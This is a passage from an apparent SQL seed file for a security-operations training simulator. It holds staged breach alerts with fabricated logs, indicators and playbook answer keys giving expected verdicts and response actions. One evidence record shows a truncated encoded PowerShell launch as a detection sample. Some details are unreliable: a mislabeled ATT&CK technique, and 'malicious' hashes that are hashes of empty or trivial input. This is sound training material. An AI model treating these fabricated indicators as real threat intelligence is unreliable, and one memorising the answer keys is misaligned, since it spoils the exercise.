Exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"customer_data_2023.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"action\\\":\\\"transferred\\\",\\\"bytes_transferred\\\":54000000,\\\"alert_id\\\":\\\"DLP-EXFIL-001\\\",\\\"status\\\":\\\"Confirmed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"event\\\":\\\"Data 
Exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"customer_data_2023.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"action\\\":\\\"transferred\\\",\\\"bytes_transferred\\\":54000000,\\\"alert_id\\\":\\\"DLP-EXFIL-001\\\",\\\"status\\\":\\\"Confirmed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"event\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"customer_data_2023.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"action\\\":\\\"transferred\\\",\\\"bytes_transferred\\\":54000000,\\\"alert_id\\\":\\\"DLP-EXFIL-001\\\",\\\"status\\\":\\\"Confirmed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"event\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"customer_data_2023.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"action\\\":\\\"transferred\\\",\\\"bytes_transferred\\\":54000000,\\\"alert_id\\\":\\\"DLP-EXFIL-001\\\",\\\"status\\\":\\\"Confirmed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1014, 'Suspicious Access Patterns Detected', 'high', 'Security Information and Event Management (SIEM)', 'Initial reports of abnormal login attempts hint at compromised credentials, marking the beginning of the breach. Multiple failed login attempts followed by a successful login from an unfamiliar IP address indicate potential credential theft.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"status\":\"Failed\",\"failure_reason\":\"Invalid password\",\"login_method\":\"Remote Desktop Protocol (RDP)\",\"related_event_id\":\"4624\",\"related_timestamp\":\"2023-10-12T14:24:10Z\",\"related_status\":\"Success\",\"related_source_ip\":\"203.0.113.45\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious_payload.exe\"}', '2026-01-17 03:50:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple unauthorized access attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in unusual activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of known 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File linked to unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.713Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Invalid password\\\",\\\"login_method\\\":\\\"Remote Desktop Protocol (RDP)\\\",\\\"related_event_id\\\":\\\"4624\\\",\\\"related_timestamp\\\":\\\"2023-10-12T14:24:10Z\\\",\\\"related_status\\\":\\\"Success\\\",\\\"related_source_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.713Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Invalid password\\\",\\\"login_method\\\":\\\"Remote Desktop Protocol 
(RDP)\\\",\\\"related_event_id\\\":\\\"4624\\\",\\\"related_timestamp\\\":\\\"2023-10-12T14:24:10Z\\\",\\\"related_status\\\":\\\"Success\\\",\\\"related_source_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.713Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Invalid password\\\",\\\"login_method\\\":\\\"Remote Desktop Protocol (RDP)\\\",\\\"related_event_id\\\":\\\"4624\\\",\\\"related_timestamp\\\":\\\"2023-10-12T14:24:10Z\\\",\\\"related_status\\\":\\\"Success\\\",\\\"related_source_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.713Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Invalid password\\\",\\\"login_method\\\":\\\"Remote Desktop Protocol 
(RDP)\\\",\\\"related_event_id\\\":\\\"4624\\\",\\\"related_timestamp\\\":\\\"2023-10-12T14:24:10Z\\\",\\\"related_status\\\":\\\"Success\\\",\\\"related_source_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.713Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Invalid password\\\",\\\"login_method\\\":\\\"Remote Desktop Protocol (RDP)\\\",\\\"related_event_id\\\":\\\"4624\\\",\\\"related_timestamp\\\":\\\"2023-10-12T14:24:10Z\\\",\\\"related_status\\\":\\\"Success\\\",\\\"related_source_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1015, 'Forged Cookie Generation Detected', 'critical', 'Network Forensics Tools', 'Attackers have been detected generating forged cookies by leveraging compromised systems. These cookies allow unauthorized account access without requiring passwords.', 'Execution', 'T1556.004', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:47Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"file_name\":\"cookie_forge.exe\",\"file_hash\":\"c3ab8ff13720e8ad9047dd39466b3c89\",\"user\":\"compromised_user\",\"process_id\":4521,\"malicious_ip\":\"203.0.113.45\",\"event\":\"Forged Cookie Generation\",\"description\":\"A forged cookie was generated to enable access to user accounts without password authentication.\"}', '2026-01-17 03:50:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP from internal network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used for unauthorized access\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"c3ab8ff13720e8ad9047dd39466b3c89\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with cookie forging malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"cookie_forge.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable involved in generating forged cookies\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account involved in suspicious 
activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1016, 'Persistence Mechanisms Activated', 'high', 'Endpoint Detection and Response (EDR)', 'Persistent access is established by embedding forged cookies across multiple sessions, evading detection.', 'Persistence', 'T1502 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:58Z\",\"event_id\":\"EDR-0723\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.50\",\"username\":\"jdoe\",\"file_created\":\"C:\\\\Windows\\\\Temp\\\\splunkcookie.tmp\",\"malware_hash\":\"3f1a5d2c3e9f8b0d6a6c3b1f4e7d9a5b\",\"event_description\":\"Suspicious temporary file creation detected. Potential malicious cookie implantation observed.\",\"file_integrity_check\":\"Failed\",\"process_name\":\"powershell.exe\",\"process_id\":3456,\"persistence_technique\":\"Forged cookies\"}', '2026-01-17 03:50:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account but potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file creation indicative of persistence techniques.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f1a5d2c3e9f8b0d6a6c3b1f4e7d9a5b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash 
Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in persistence mechanisms.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1017, 'Lateral Movement Across Accounts', 'high', 'User Behavior Analytics (UBA)', 'The attackers are performing lateral movement, targeting accounts of journalists and other high-value individuals in an attempt to expand their influence.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"lateral_movement\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"user\":\"jdoe\",\"target_accounts\":[\"journalist1@news.com\",\"editor@media.org\"],\"malware_filename\":\"APT29_toolkit.exe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"login_attempt\",\"status\":\"success\",\"extra_info\":{\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"session_id\":\"abc123xyz\",\"external_references\":[\"https://threatintel.report/apt29\"]}}', '2026-01-17 03:50:17', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Account usage patterns inconsistent with typical behavior.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29 
malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"user\\\":\\\"jdoe\\\",\\\"target_accounts\\\":[\\\"journalist1@news.com\\\",\\\"editor@media.org\\\"],\\\"malware_filename\\\":\\\"APT29_toolkit.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"extra_info\\\":{\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"external_references\\\":[\\\"https://threatintel.report/apt29\\\"]}}\"},{\"timestamp\":\"2026-02-01T20:31:22.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"user\\\":\\\"jdoe\\\",\\\"target_accounts\\\":[\\\"journalist1@news.com\\\",\\\"editor@media.org\\\"],\\\"malware_filename\\\":\\\"APT29_toolkit.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"extra_info\\\":{\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"external_references\\\":[\\\"https://threatintel.report/apt29\\\"]}}\"},{\"timestamp\":\"2026-02-01T20:30:22.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"user\\\":\\\"jdoe\\\",\\\"target_accounts\\\":[\\\"journalist1@news.com\\\",\\\"editor@media.org\\\"],\\\"malware_filename\\\":\\\"APT29_toolkit.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"extra_info\\\":{\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"external_references\\\":[\\\"https://threatintel.report/apt29\\\"]}}\"},{\"timestamp\":\"2026-02-01T20:29:22.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"user\\\":\\\"jdoe\\\",\\\"target_accounts\\\":[\\\"journalist1@news.com\\\",\\\"editor@media.org\\\"],\\\"malware_filename\\\":\\\"APT29_toolkit.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"extra_info\\\":{\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"external_references\\\":[\\\"https://threatintel.report/apt29\\\"]}}\"},{\"timestamp\":\"2026-02-01T20:28:22.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"user\\\":\\\"jdoe\\\",\\\"target_accounts\\\":[\\\"journalist1@news.com\\\",\\\"editor@media.org\\\"],\\\"malware_filename\\\":\\\"APT29_toolkit.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"extra_info\\\":{\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"external_references\\\":[\\\"https://threatintel.report/apt29\\\"]}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1018, 'Massive Data Exfiltration', 'critical', 'Data Loss Prevention (DLP) Systems', 'Sensitive information has been exfiltrated from several compromised accounts, marking the final and most damaging stage of the breach.', 'Exfiltration', 'T1020: Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"event_id\":\"DLP-EXFIL-20231015-0005\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.150\",\"username\":\"jdoe\",\"filename\":\"sensitive_data.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"bytes_transferred\":10485760,\"external_attacker_ip\":\"203.0.113.150\"}', '2026-01-17 03:50:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"Account involved in unauthorized data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive corporate data.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Hash of a file involved in data 
exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.718Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-0005\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.150\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760,\\\"external_attacker_ip\\\":\\\"203.0.113.150\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.718Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-0005\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.150\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760,\\\"external_attacker_ip\\\":\\\"203.0.113.150\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.718Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
